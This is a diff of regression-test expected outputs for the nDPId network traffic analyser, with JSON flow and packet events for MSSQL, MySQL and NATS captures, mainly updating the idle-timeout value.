+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":14142,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":60,"global_ts_msec":1278068444666} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/mysql-8.pcap.out b/test/results/mysql-8.pcap.out index 814eefef6..cb3dfe61f 100644 --- a/test/results/mysql-8.pcap.out +++ b/test/results/mysql-8.pcap.out 
@@ -1,11 +1,11 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mysql-8.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946708780103} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946708780103,"flow_last_seen":946708780103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946708780103,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946708780103,"flow_last_seen":946708780103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946708780103,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":87,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946708780104} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 diff --git a/test/results/nats.pcap.out b/test/results/nats.pcap.out index c261f2552..934da384e 100644 --- a/test/results/nats.pcap.out +++ b/test/results/nats.pcap.out 
@@ -1,17 +1,17 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nats.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1586288040558} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040558,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040558,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 
+00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} 
